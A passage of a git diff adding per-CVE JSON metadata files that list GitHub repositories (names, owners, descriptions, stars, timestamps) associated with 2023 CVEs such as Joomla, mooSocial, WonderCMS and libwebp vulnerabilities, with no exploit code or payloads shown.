+ "pushed_at": "2023-11-20T19:06:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40626.json b/2023/CVE-2023-40626.json
new file mode 100644
index 0000000000..0d1ce8158c
--- /dev/null
+++ b/2023/CVE-2023-40626.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 725270431,
+ "name": "Joomla-3.10.12-languagehelper-hotfix",
+ "full_name": "TLWebdesign\/Joomla-3.10.12-languagehelper-hotfix",
+ "owner": {
+ "login": "TLWebdesign",
+ "id": 4402824,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4402824?v=4",
+ "html_url": "https:\/\/github.com\/TLWebdesign"
+ },
+ "html_url": "https:\/\/github.com\/TLWebdesign\/Joomla-3.10.12-languagehelper-hotfix",
+ "description": "Plugin to fix security vulnerability CVE-2023-40626 in Joomla 3.10.12",
+ "fork": false,
+ "created_at": "2023-11-29T19:46:15Z",
+ "updated_at": "2024-05-20T11:38:12Z",
+ "pushed_at": "2024-02-21T01:11:51Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-40626",
+ "joomla",
+ "joomla3",
+ "php",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40868.json b/2023/CVE-2023-40868.json
new file mode 100644
index 0000000000..419f89e74f
--- /dev/null
+++ b/2023/CVE-2023-40868.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 686179384,
+ "name": "CVE-2023-40868",
+ "full_name": "MinoTauro2020\/CVE-2023-40868",
+ "owner": {
+ "login": "MinoTauro2020",
+ "id": 65294596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4",
+ "html_url": "https:\/\/github.com\/MinoTauro2020"
+ },
+ "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-40868",
+ "description": " Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.",
+ "fork": false,
+ "created_at": "2023-09-02T00:24:22Z",
+ "updated_at": "2023-09-02T00:24:23Z",
+ "pushed_at": "2023-09-02T00:39:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40869.json b/2023/CVE-2023-40869.json
new file mode 100644
index 0000000000..4690f43d4a
--- /dev/null
+++ b/2023/CVE-2023-40869.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 686183183,
+ "name": "CVE-2023-40869",
+ "full_name": "MinoTauro2020\/CVE-2023-40869",
+ "owner": {
+ "login": "MinoTauro2020",
+ "id": 65294596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4",
+ "html_url": "https:\/\/github.com\/MinoTauro2020"
+ },
+ "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-40869",
+ "description": " Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions",
+ "fork": false,
+ "created_at": "2023-09-02T00:47:37Z",
+ "updated_at": "2023-09-02T00:47:37Z",
+ "pushed_at": "2023-09-02T00:58:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40924.json b/2023/CVE-2023-40924.json
new file mode 100644
index 0000000000..16df6457b8
--- /dev/null
+++ b/2023/CVE-2023-40924.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 678880382,
+ "name": "CVE-2023-40924",
+ "full_name": "Yobing1\/CVE-2023-40924",
+ "owner": {
+ "login": "Yobing1",
+ "id": 135513064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135513064?v=4",
+ "html_url": "https:\/\/github.com\/Yobing1"
+ },
+ "html_url": "https:\/\/github.com\/Yobing1\/CVE-2023-40924",
+ "description": "SolarView vuln",
+ "fork": false,
+ "created_at": "2023-08-15T15:44:58Z",
+ "updated_at": "2023-11-30T09:08:49Z",
+ "pushed_at": "2023-09-09T01:48:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40930.json b/2023/CVE-2023-40930.json
new file mode 100644
index 0000000000..17513bfda6
--- /dev/null
+++ b/2023/CVE-2023-40930.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688584647,
+ "name": "CVE-2023-40930",
+ "full_name": "NSnidie\/CVE-2023-40930",
+ "owner": {
+ "login": "NSnidie",
+ "id": 88715174,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88715174?v=4",
+ "html_url": "https:\/\/github.com\/NSnidie"
+ },
+ "html_url": "https:\/\/github.com\/NSnidie\/CVE-2023-40930",
+ "description": " CVE-2023-40930 Repetition Enviroment",
+ "fork": false,
+ "created_at": "2023-09-07T16:50:02Z",
+ "updated_at": "2023-09-13T03:11:12Z",
+ "pushed_at": "2023-09-07T17:15:17Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40931.json b/2023/CVE-2023-40931.json
new file mode 100644
index 0000000000..e9580639d6
--- /dev/null
+++ b/2023/CVE-2023-40931.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 792582569,
+ "name": "CVE-2023-40931-PoC",
+ "full_name": "sealldeveloper\/CVE-2023-40931-PoC",
+ "owner": {
+ "login": "sealldeveloper",
+ "id": 120470330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4",
+ "html_url": "https:\/\/github.com\/sealldeveloper"
+ },
+ "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2023-40931-PoC",
+ "description": "The sqlmap payload to exploit CVE-2023-40931",
+ "fork": false,
+ "created_at": "2024-04-27T01:42:23Z",
+ "updated_at": "2024-06-06T07:25:30Z",
+ "pushed_at": "2024-04-27T01:43:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40933.json b/2023/CVE-2023-40933.json
new file mode 100644
index 0000000000..dca7c80a36
--- /dev/null
+++ b/2023/CVE-2023-40933.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 792583023,
+ "name": "CVE-2023-40933-PoC",
+ "full_name": "sealldeveloper\/CVE-2023-40933-PoC",
+ "owner": {
+ "login": "sealldeveloper",
+ "id": 120470330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4",
+ "html_url": "https:\/\/github.com\/sealldeveloper"
+ },
+ "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2023-40933-PoC",
+ "description": "The sqlmap payload to exploit CVE-2023-40933",
+ "fork": false,
+ "created_at": "2024-04-27T01:44:44Z",
+ "updated_at": "2024-04-27T01:46:43Z",
+ "pushed_at": "2024-04-27T01:46:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40989.json b/2023/CVE-2023-40989.json
new file mode 100644
index 0000000000..da713fe173
--- /dev/null
+++ b/2023/CVE-2023-40989.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 694154973,
+ "name": "CVE-2023-40989",
+ "full_name": "Zone1-Z\/CVE-2023-40989",
+ "owner": {
+ "login": "Zone1-Z",
+ "id": 145569866,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145569866?v=4",
+ "html_url": "https:\/\/github.com\/Zone1-Z"
+ },
+ "html_url": "https:\/\/github.com\/Zone1-Z\/CVE-2023-40989",
+ "description": "SQL injection vulnerbility in jeecgboot jeecg-boot v. allows a remote attacker to execute arbitrary code via a crafted request to the report\/jeecgboot\/jmreport\/queryFieldBySql component.",
+ "fork": false,
+ "created_at": "2023-09-20T12:43:23Z",
+ "updated_at": "2023-09-20T12:43:23Z",
+ "pushed_at": "2023-09-22T07:19:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41064.json b/2023/CVE-2023-41064.json
new file mode 100644
index 0000000000..dcdeee776b
--- /dev/null
+++ b/2023/CVE-2023-41064.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 712037145,
+ "name": "vulnerabilidad-LibWebP-CVE-2023-41064",
+ "full_name": "MrR0b0t19\/vulnerabilidad-LibWebP-CVE-2023-41064",
+ "owner": {
+ "login": "MrR0b0t19",
+ "id": 63489501,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4",
+ "html_url": "https:\/\/github.com\/MrR0b0t19"
+ },
+ "html_url": "https:\/\/github.com\/MrR0b0t19\/vulnerabilidad-LibWebP-CVE-2023-41064",
+ "description": "longitudes de código para desencadenar esta vulnerabilidad",
+ "fork": false,
+ "created_at": "2023-10-30T17:03:24Z",
+ "updated_at": "2023-10-30T17:19:13Z",
+ "pushed_at": "2023-11-23T21:38:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 718237903,
+ "name": "CVE-2023-41064",
+ "full_name": "MrR0b0t19\/CVE-2023-41064",
+ "owner": {
+ "login": "MrR0b0t19",
+ "id": 63489501,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4",
+ "html_url": "https:\/\/github.com\/MrR0b0t19"
+ },
+ "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2023-41064",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-13T17:07:02Z",
+ "updated_at": "2024-02-23T21:57:16Z",
+ "pushed_at": "2023-11-13T17:07:11Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 753988072,
+ "name": "CVE-2023-41064-POC",
+ "full_name": "alsaeroth\/CVE-2023-41064-POC",
+ "owner": {
+ "login": "alsaeroth",
+ "id": 159212133,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4",
+ "html_url": "https:\/\/github.com\/alsaeroth"
+ },
+ "html_url": "https:\/\/github.com\/alsaeroth\/CVE-2023-41064-POC",
+ "description": "C implementation of Image I\/O 0-click vulnerability",
+ "fork": false,
+ "created_at": "2024-02-07T07:11:41Z",
+ "updated_at": "2024-03-22T17:09:51Z",
+ "pushed_at": "2024-02-07T07:11:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41080.json b/2023/CVE-2023-41080.json
new file mode 100644
index 0000000000..8d39f0db6b
--- /dev/null
+++ b/2023/CVE-2023-41080.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 683435690,
+ "name": "CVE-2023-41080",
+ "full_name": "shiomiyan\/CVE-2023-41080",
+ "owner": {
+ "login": "shiomiyan",
+ "id": 35842766,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35842766?v=4",
+ "html_url": "https:\/\/github.com\/shiomiyan"
+ },
+ "html_url": "https:\/\/github.com\/shiomiyan\/CVE-2023-41080",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-26T15:11:31Z",
+ "updated_at": "2023-12-20T14:22:09Z",
+ "pushed_at": "2023-08-31T14:44:10Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41105.json b/2023/CVE-2023-41105.json
new file mode 100644
index 0000000000..d43cd737e7
--- /dev/null
+++ b/2023/CVE-2023-41105.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700620391,
+ "name": "CVE-2023-41105-Exploit",
+ "full_name": "JawadPy\/CVE-2023-41105-Exploit",
+ "owner": {
+ "login": "JawadPy",
+ "id": 98477272,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98477272?v=4",
+ "html_url": "https:\/\/github.com\/JawadPy"
+ },
+ "html_url": "https:\/\/github.com\/JawadPy\/CVE-2023-41105-Exploit",
+ "description": "Example of CVE-2023-41105",
+ "fork": false,
+ "created_at": "2023-10-05T00:32:31Z",
+ "updated_at": "2023-10-13T07:44:35Z",
+ "pushed_at": "2023-10-13T07:07:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41265.json b/2023/CVE-2023-41265.json
new file mode 100644
index 0000000000..b9070ab8db
--- /dev/null
+++ b/2023/CVE-2023-41265.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685151719,
+ "name": "zeroqlik-detect",
+ "full_name": "praetorian-inc\/zeroqlik-detect",
+ "owner": {
+ "login": "praetorian-inc",
+ "id": 8173787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8173787?v=4",
+ "html_url": "https:\/\/github.com\/praetorian-inc"
+ },
+ "html_url": "https:\/\/github.com\/praetorian-inc\/zeroqlik-detect",
+ "description": "A Nuclei template to detect ZeroQlik (CVE-2023-41265 and CVE-2023-41266)",
+ "fork": false,
+ "created_at": "2023-08-30T16:15:19Z",
+ "updated_at": "2024-05-26T06:10:47Z",
+ "pushed_at": "2023-08-30T18:28:07Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4128.json b/2023/CVE-2023-4128.json
new file mode 100644
index 0000000000..d18064b606
--- /dev/null
+++ b/2023/CVE-2023-4128.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693501334,
+ "name": "linux-4.1.15_CVE-2023-4128",
+ "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-4128",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-4128",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-19T06:45:47Z",
+ "updated_at": "2023-09-19T06:52:28Z",
+ "pushed_at": "2023-09-19T08:02:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41362.json b/2023/CVE-2023-41362.json
new file mode 100644
index 0000000000..49d3e094cf
--- /dev/null
+++ b/2023/CVE-2023-41362.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 689929838,
+ "name": "CVE-2023-41362_MyBB_ACP_RCE",
+ "full_name": "SorceryIE\/CVE-2023-41362_MyBB_ACP_RCE",
+ "owner": {
+ "login": "SorceryIE",
+ "id": 74211927,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74211927?v=4",
+ "html_url": "https:\/\/github.com\/SorceryIE"
+ },
+ "html_url": "https:\/\/github.com\/SorceryIE\/CVE-2023-41362_MyBB_ACP_RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-11T07:49:38Z",
+ "updated_at": "2024-02-07T09:04:53Z",
+ "pushed_at": "2023-09-11T10:19:29Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41425.json b/2023/CVE-2023-41425.json
new file mode 100644
index 0000000000..0bfaaa5f53
--- /dev/null
+++ b/2023/CVE-2023-41425.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 714671678,
+ "name": "CVE-2023-41425",
+ "full_name": "prodigiousMind\/CVE-2023-41425",
+ "owner": {
+ "login": "prodigiousMind",
+ "id": 76691910,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76691910?v=4",
+ "html_url": "https:\/\/github.com\/prodigiousMind"
+ },
+ "html_url": "https:\/\/github.com\/prodigiousMind\/CVE-2023-41425",
+ "description": "WonderCMS Authenticated RCE - CVE-2023-41425",
+ "fork": false,
+ "created_at": "2023-11-05T15:06:43Z",
+ "updated_at": "2024-01-29T22:13:44Z",
+ "pushed_at": "2023-11-06T18:56:53Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cves",
+ "exploit",
+ "rce-exploit",
+ "wondercms"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41436.json b/2023/CVE-2023-41436.json
new file mode 100644
index 0000000000..93b128dd29
--- /dev/null
+++ b/2023/CVE-2023-41436.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 682073746,
+ "name": "CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content",
+ "full_name": "sromanhu\/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content",
+ "description": "CSZ CMS 1.3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Additional Meta Tag parameter in the Pages Content Menu.",
+ "fork": false,
+ "created_at": "2023-08-23T11:34:30Z",
+ "updated_at": "2023-09-25T14:18:40Z",
+ "pushed_at": "2023-09-22T12:20:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4145.json b/2023/CVE-2023-4145.json
new file mode 100644
index 0000000000..33fe7ca318
--- /dev/null
+++ b/2023/CVE-2023-4145.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 786354655,
+ "name": "CVE-2023-4145-2",
+ "full_name": "miguelc49\/CVE-2023-4145-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:39:01Z",
+ "updated_at": "2024-04-14T17:40:27Z",
+ "pushed_at": "2024-04-14T17:40:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786354666,
+ "name": "CVE-2023-4145-1",
+ "full_name": "miguelc49\/CVE-2023-4145-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:39:04Z",
+ "updated_at": "2024-04-14T17:40:24Z",
+ "pushed_at": "2024-04-14T17:40:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786354680,
+ "name": "CVE-2023-4145-3",
+ "full_name": "miguelc49\/CVE-2023-4145-3",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-3",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:39:09Z",
+ "updated_at": "2024-04-14T17:40:32Z",
+ "pushed_at": "2024-04-14T17:40:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41474.json b/2023/CVE-2023-41474.json
new file mode 100644
index 0000000000..04b1dd3d31
--- /dev/null
+++ b/2023/CVE-2023-41474.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 740379330,
+ "name": "CVE-2023-41474",
+ "full_name": "JBalanza\/CVE-2023-41474",
+ "owner": {
+ "login": "JBalanza",
+ "id": 31896165,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31896165?v=4",
+ "html_url": "https:\/\/github.com\/JBalanza"
+ },
+ "html_url": "https:\/\/github.com\/JBalanza\/CVE-2023-41474",
+ "description": "Public disclosure of Ivanti's Avalanche Path Traversal vulnerability",
+ "fork": false,
+ "created_at": "2024-01-08T08:21:39Z",
+ "updated_at": "2024-03-29T00:14:56Z",
+ "pushed_at": "2024-01-08T08:46:27Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41507.json b/2023/CVE-2023-41507.json
new file mode 100644
index 0000000000..944ced9128
--- /dev/null
+++ b/2023/CVE-2023-41507.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 687283979,
+ "name": "CVE-2023-41507",
+ "full_name": "redblueteam\/CVE-2023-41507",
+ "owner": {
+ "login": "redblueteam",
+ "id": 29709246,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29709246?v=4",
+ "html_url": "https:\/\/github.com\/redblueteam"
+ },
+ "html_url": "https:\/\/github.com\/redblueteam\/CVE-2023-41507",
+ "description": "CVE-2023-41507 A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.",
+ "fork": false,
+ "created_at": "2023-09-05T03:26:15Z",
+ "updated_at": "2023-09-05T03:26:16Z",
+ "pushed_at": "2023-09-07T23:38:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41508.json b/2023/CVE-2023-41508.json
new file mode 100644
index 0000000000..3abeb820cb
--- /dev/null
+++ b/2023/CVE-2023-41508.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 687284713,
+ "name": "CVE-2023-41508",
+ "full_name": "redblueteam\/CVE-2023-41508",
+ "owner": {
+ "login": "redblueteam",
+ "id": 29709246,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29709246?v=4",
+ "html_url": "https:\/\/github.com\/redblueteam"
+ },
+ "html_url": "https:\/\/github.com\/redblueteam\/CVE-2023-41508",
+ "description": "CVE-2023-41508 - A hard-coded password in Super Store Finder v3.6 allows attackers to access the administration panel.",
+ "fork": false,
+ "created_at": "2023-09-05T03:29:37Z",
+ "updated_at": "2023-11-02T03:37:03Z",
+ "pushed_at": "2023-09-07T23:41:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41533.json b/2023/CVE-2023-41533.json
new file mode 100644
index 0000000000..ec162e109d
--- /dev/null
+++ b/2023/CVE-2023-41533.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688436461,
+ "name": "CVE-2023-41533",
+ "full_name": "Sh33talUmath\/CVE-2023-41533",
+ "owner": {
+ "login": "Sh33talUmath",
+ "id": 144338561,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4",
+ "html_url": "https:\/\/github.com\/Sh33talUmath"
+ },
+ "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41533",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-07T10:50:03Z",
+ "updated_at": "2023-09-07T10:50:03Z",
+ "pushed_at": "2023-09-07T10:57:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
